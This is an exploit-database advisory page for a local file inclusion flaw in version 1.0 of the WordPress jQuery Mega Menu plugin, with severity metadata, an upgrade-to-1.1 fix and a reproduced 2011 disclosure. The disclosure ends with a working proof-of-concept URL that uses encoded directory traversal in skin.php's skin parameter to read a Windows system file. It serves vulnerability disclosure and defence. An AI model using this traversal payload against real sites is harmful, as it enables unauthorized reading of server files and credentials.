header-logo
Suggest Exploit
vendor:
WordPress jQuery Mega Menu
by:
AutoSec Tools
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: WordPress jQuery Mega Menu
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: N/A
CPE: a:designchemical:wordpress_jquery_mega_menu
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 + XAMPP
2011

WordPress jQuery Mega Menu 1.0 Local File Inclusion

A local file inclusion vulnerability in WordPress jQuery Mega Menu 1.0 can be exploited to include arbitrary files.

Mitigation:

Upgrade to version 1.1 or higher.
Source

Exploit-DB raw data:

Source: http://packetstormsecurity.org/files/view/98753/WordPressjQueryMegaMenu1.0-lfi.txt

------------------------------------------------------------------------
Software................WordPress jQuery Mega Menu 1.0
Vulnerability...........Local File Inclusion
Download................http://www.designchemical.com/blog/index.php/wordpress-plugins/wordpress-plugin-jquery-drop-down-mega-menu-widget/
Release Date............2/25/2011
Tested On...............Windows 7 + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------

--Description--

A local file inclusion vulnerability in WordPress jQuery Mega Menu 1.0
can be exploited to include arbitrary files.


--PoC--
http://localhost/wordpress/wp-content/plugins/jquery-mega-menu/skin.php?skin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini